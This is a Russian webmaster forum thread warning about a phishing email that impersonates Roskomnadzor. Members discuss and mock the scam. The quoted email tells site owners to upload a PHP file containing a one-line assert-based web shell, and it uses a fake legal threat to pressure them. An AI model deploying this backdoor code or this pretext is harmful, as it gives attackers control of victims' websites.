[Avot]

Сегодня от хостера пришло:

Сегодня участились случаи взлома сайтов пользователей.

На контактный email домена приходят сообщения под видом письма от Роскомнадзора с просьбой разместить у себя файл reestr/reestr-id128032.php, содержащий в себе вредоносный код.

После размещения данного файла злоумышленники могут получить доступ к данным Вашего сайта.

Содержание мошеннического письма (вместо многоточия в тексте письма имя Вашего домена):

" Вы получили данное уведомление от Федеральной службы по надзору в сфере связи,
информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором
доменного имени … в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт … был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени … , Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:
< ?php
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: …/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ..., следую инструкции указанной выше, то Ваш сайт … будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации "

Будьте осторожны, типа того

[brainix]

Вдогонку:
_http://habrahabr.ru/post/265515/
_http://habrahabr.ru/post/265513/

[VadimPRO]

brainix, ага, я вот буквально час назад видел эти статьи
представляю сколько людей повелось и сколько могут начудить эти хитрецы...

[Feanor184]

Скорее всего очень не много людей поведется в такой формулировке. Если человек имеет сайт с посещалкой в 3к+ уников в сутки, то он явно не законченный тупица) Вставлять на свой сайт какой-то код на основании письма с непонятного адреса - в наш век - верх идиотизма)) Тем более, для незнакомых с php можно просто погуглить значение ?php assert =)
Но сама идея у организаторов неплохая)

[seogitler]

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ..., следую инструкции указанной выше, то Ваш сайт … будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федераци

Даже такую сурьезную разводку испортили последним абзацем. Опять школота балуется.

[PermProd]

Avot, меня даже мой хостинг предупредил о опасности.
В очередной раз убеждаюсь в том, что Beget отличный хостер.

[Виктор1974]

Также получил сегодня письма - от мошенников и от хостера с предупреждением о мошенничестве. И за август вообще спама в почтовых ящиках увеличилось в разы. Школьники пробуют срубить бабла нахаляву. Но писать без ошибок они так и не научились.

[DaImeR]

Где вы так палите свою почту? Что не день к Вам приходят веселые письма...раньше пугали DLE, сейчас уже Роскомнадзором

[seogitler]

DaImeR, чрез регистратора можно написать письмо владельцу сайта

[Ems]

Кто-нибудь с этого форума повёлся на разводку?